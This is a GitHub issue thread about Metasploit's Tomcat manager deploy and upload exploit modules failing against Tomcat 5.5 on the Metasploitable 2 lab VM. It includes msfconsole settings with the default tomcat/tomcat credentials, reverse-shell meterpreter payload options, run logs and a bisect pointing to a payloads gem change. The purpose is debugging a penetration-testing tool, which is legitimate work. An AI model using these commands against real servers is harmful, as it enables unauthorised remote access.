Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

multi/http/tomcat_mgr_deploy and multi/http/tomcat_mgr_upload not working (anymore) in latest Metasploit versions against Tomcat 5.5 in Metasploitable 2 #19174

Open
onillap opened this issue May 8, 2024 · 6 comments
Open

multi/http/tomcat_mgr_deploy and multi/http/tomcat_mgr_upload not working (anymore) in latest Metasploit versions against Tomcat 5.5 in Metasploitable 2 #19174

onillap opened this issue May 8, 2024 · 6 comments
Labels
bug confirmed Issues confirmed by a committer

Comments

@onillap
Copy link

onillap commented May 8, 2024

Steps to reproduce

How'd you do it?

  1. Download Kali, update it and run msfconsole
  2. Download Metasploitable 2 VM and run it
  3. Select multi/http/tomcat_mgr_deploy and configure it as:
  4. set HttpUsername tomcat
  5. set HttpPassword tomcat
  6. set RHOSTS to IP address of Metasploitable 2 VM
  7. set RPORT 8180
  8. run

This exploit fails, but used to work in previous 6.2.x and 6.3.x Metasploit versions.
Also exploit/multi/http/tomcat_mgr_upload fails in a very similar way, but I don't know if this one previously worked or not...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

Were you following a specific guide/tutorial or reading documentation?

No

Expected behavior

In previous versions of Metasploitable , for example 6.2.20 and 6.3.16, the exploit worked and I always got a Meterpreter shell.

Current behavior

msf6 exploit(multi/http/tomcat_mgr_deploy) > run

[] Started reverse TCP handler on 192.168.1.195:4444
[] Attempting to automatically select a target...
[*] OK - Server info
Tomcat Version: Apache Tomcat/5.5
OS Name: Linux
OS Version: 2.6.24-16-server
OS Architecture: i386
JVM Version: 1.5.0
JVM Vendor: Free Software Foundation, Inc.

[] Automatically selected target "Linux x86"
[] Uploading 6130 bytes as J5kgeJK2VwgsZjYwJINJd.war ...
[] Executing /J5kgeJK2VwgsZjYwJINJd/sqlYt1OOhUN2.jsp...
[-] Execution failed on J5kgeJK2VwgsZjYwJINJd [500 Internal Server Error]
[] <title>Apache Tomcat/5.5 - Error report</title><style></style>

HTTP Status 500 -

type Exception report

message

description The server encountered an internal error () that prevented it from fulfilling this request.

exception 

javax.servlet.ServletException: Wrapper cannot find servlet class metasploit.PayloadServlet or a class it depends on

org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)

org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)

org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)

org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(Http11BaseProtocol.java:665)

org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(PoolTcpEndpoint.java:528)

org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(LeaderFollowerWorkerThread.java:81)

org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689)

java.lang.Thread.run(libgcj.so.81)

root cause 

java.lang.ClassNotFoundException: metasploit.PayloadServlet

org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1362)

org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1208)

java.security.AccessController.doPrivileged(libgcj.so.81)

org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)

org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)

org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)

org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(Http11BaseProtocol.java:665)

org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(PoolTcpEndpoint.java:528)

org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(LeaderFollowerWorkerThread.java:81)

org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689)

java.lang.Thread.run(libgcj.so.81)

note The full stack trace of the root cause is available in the Apache Tomcat/5.5 logs.

Apache Tomcat/5.5


[*] Undeploying J5kgeJK2VwgsZjYwJINJd ...

[*] Exploit completed, but no session was created.

Metasploit version

Framework: 6.4.5-dev
Console : 6.4.5-dev

Additional Information

If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.

If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outisde msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.

  1. Start msfconsole
  2. Run the command set loglevel 3
  3. Take the steps necessary recreate your issue
  4. Run the debug command
  5. Copy all the output below the ===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<=== line and make sure to REMOVE ANY SENSITIVE INFORMATION.
  6. Replace these instructions and the paragraph above with the output from step 5.

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse 
[framework/ui/console]
ActiveModule=exploit/multi/http/tomcat_mgr_deploy

[multi/http/tomcat_mgr_deploy]
HttpPassword=tomcat
HttpUsername=tomcat
RHOSTS=192.168.1.148
RPORT=8180
VERBOSE=true
loglevel=3
WORKSPACE=
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
VHOST=
SSL=false
Proxies=
UserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
SSLServerNameIndication=
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::shuffle_get_params=false
HTTP::shuffle_post_params=false
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
PATH=/manager
LHOST=192.168.1.195
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
JavaMeterpreterDebug=false
Spawn=2
AESPassword=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
MeterpreterDebugBuild=false
MeterpreterDebugLogging=

Database Configuration

The database contains the following information:

Collapse 
Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

Collapse 
109    search tomcat
110    use exploit/multi/http/tomcat_mgr_deploy
111    show options
112    set HttpPassword tomcat
113    set HttpUsername tomcat
114    set RHOSTS 192.168.75.128
115    set RPORT 8180
116    run
117    set RHOSTS 192.168.1.148
118    run
119    set verbose true
120    run
121    use exploit/multi/http/tomcat_mgr_upload
123    info
124    set RHOSTS 192.168.1.148
125    set RPORT 8180
126    set verbose true
127    set HttpPassword tomcat
128    set HttpUsername tomcat
129    run
130    set verbose true
131    run
137    use exploit/multi/http/tomcat_mgr_deploy
138    show options
140    run
141    version
142    set loglevel 3
143    run
144    debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse 
[05/08/2024 19:04:51] [e(0)] core: Failed to connect to the database: No database YAML file

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse 
msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse 
[07/04/2023 16:36:13] [e(0)] core: Failed to connect to the database: No database YAML file
[07/04/2023 16:36:19] [d(0)] core: HistoryManager.push_context name: :msfconsole
[07/04/2023 16:47:45] [d(0)] core: HistoryManager.push_context name: :meterpreter
[07/04/2023 16:51:10] [w(0)] core: monitor_rsock: the remote socket has been closed, exiting loop
[07/04/2023 16:52:28] [d(0)] core: HistoryManager.pop_context name: :meterpreter
[07/04/2023 16:54:55] [d(0)] core: monitor_rsock: EOF in rsock
[07/04/2023 16:54:55] [d(0)] core: monitor_rsock: EOF in rsock
[07/04/2023 16:54:56] [d(0)] core: HistoryManager.push_context name: :meterpreter
[07/04/2023 16:56:16] [w(0)] core: monitor_rsock: the remote socket has been closed, exiting loop
[07/04/2023 16:59:34] [d(0)] core: HistoryManager.pop_context name: :meterpreter
[07/04/2023 16:59:34] [w(0)] core: Session 2 has died
[07/04/2023 16:59:44] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[05/08/2024 19:04:51] [e(0)] core: Failed to connect to the database: No database YAML file

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse 
msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse 
Framework: 6.4.5-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.1.4 24 Oct 2023
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
@onillap onillap added the bug label May 8, 2024
@nrathaus
Copy link
Contributor

@onillap not sure if it will work to solve your issue, but can you pick a different payload via the target Linux x86 option?

@onillap
Copy link
Author

onillap commented May 15, 2024

Hello,
I need a meterpreter shell and there is a limited set of payloads to try but all of them fail.
For example:
msf6 exploit(multi/http/tomcat_mgr_deploy) > set payload payload/multi/meterpreter/reverse_http
payload => multi/meterpreter/reverse_http
msf6 exploit(multi/http/tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

Name Current Setting Required Description

HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.148 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host

Payload options (multi/meterpreter/reverse_http):

Name Current Setting Required Description

LHOST 192.168.1.195 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path

Exploit target:

Id Name

0 Automatic

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/tomcat_mgr_deploy) > run

[] Started HTTP reverse handler on http://192.168.1.195:8080
[] Attempting to automatically select a target...
[*] OK - Server info
Tomcat Version: Apache Tomcat/5.5
OS Name: Linux
OS Version: 2.6.24-16-server
OS Architecture: i386
JVM Version: 1.5.0
JVM Vendor: Free Software Foundation, Inc.

[] Automatically selected target "Linux x86"
[] Uploading 1479 bytes as uUagkTkaJ7.war ...
[] Executing /uUagkTkaJ7/b9AfoA8QePXs2gxo9wIqmm8r.jsp...
[] Undeploying uUagkTkaJ7 ...

[*] Exploit completed, but no session was created.

I also tried payload/java/shell/bind_tcp and payload/java/shell/reverse_tcp and others but it makes no difference.
Something has changed from version 6.4 and broke at least this exploit against Metasploitable 2, which is odd since it's a good VM to use for learning.

@adfoster-r7 adfoster-r7 added the confirmed Issues confirmed by a committer label May 15, 2024
@adfoster-r7
Copy link
Contributor

adfoster-r7 commented May 15, 2024
edited

Metasploit 6.4.x 🔴

msf6 exploit(multi/http/tomcat_mgr_deploy) > run rhost=192.168.123.132 rport=8180 lhost=192.168.123.1 httptrace=true httppassword=tomcat httpusername=tomcat

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Attempting to automatically select a target...
....

####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 2880
Date: Wed, 15 May 2024 21:40:48 GMT
Connection: close

<html><head><title>Apache Tomcat/5.5 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Wrapper cannot find servlet class metasploit.PayloadServlet or a class it depends on
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)
	org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)
	org.apache.coyote.http11.Http11BaseProtocol$Http11ConnectionHandler.processConnection(Http11BaseProtocol.java:665)
	org.apache.tomcat.util.net.PoolTcpEndpoint.processSocket(PoolTcpEndpoint.java:528)
	org.apache.tomcat.util.net.LeaderFollowerWorkerThread.runIt(LeaderFollowerWorkerThread.java:81)
	org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689)
	java.lang.Thread.run(libgcj.so.81)
</pre></p><p><b>root cause</b> <pre>java.lang.ClassNotFoundException: metasploit.PayloadServlet
	org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1362)
	org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1208)
	java.security.AccessController.doPrivileged(libgcj.so.81)
	org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
	org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151)
	org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:874)
	org.apache.coy ....

[*] Exploit completed, but no session was created.

Metasploit 6.1.x 🟢

msf6 exploit(multi/http/tomcat_mgr_deploy) > run rhost=192.168.123.132 rport=8180 lhost=192.168.123.1 httptrace=true httppassword=tomcat httpusername=tomcat

....

[*] Sending stage (58082 bytes) to 192.168.123.132
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.132:36369) at 2024-05-15 22:43:19 +0100

meterpreter >

Would need to run a git bisect to work out where the issue is, similar to this issue

@onillap
Copy link
Author

onillap commented May 22, 2024

Since the error seems to be "javax.servlet.ServletException: Wrapper cannot find servlet class metasploit.PayloadServlet or a class it depends on", probably it might be related to this change which adds support for newer JDKs but breaks it with older ones:
rapid7/metasploit-payloads#672

@adfoster-r7
Copy link
Contributor

Thanks for taking a look 👍

If this pull request fails #18445 - i.e. git checkout 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2 and the previous commit passes, i.e. git checkout 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2~1 - then that would be a good confirmation of those changes being the issue 👀

@wolfcod
Copy link

wolfcod commented May 23, 2024

Hello, I ran some tests, and this is the output

The commit 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2~1 is working fine, it uses the gem metasploit-payloads 2.0.154.

The commit 7f7f106b923a2ff7a8d76a46dbabc6c20be902c2 uses the gem 2.0.156, and the next change in metasploit-framework.gemspec uses directly the gem 2.0.159 (I didn't find in the history 2.0.157, 2.158).
Running the exploit with this gem doesn't work (Internal Server error).

Commit c73e815

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug confirmed Issues confirmed by a committer
Projects
Metasploit Kanban
Status: No status
Milestone
No milestone
Development

No branches or pull requests
4 participants
@nrathaus @wolfcod @onillap @adfoster-r7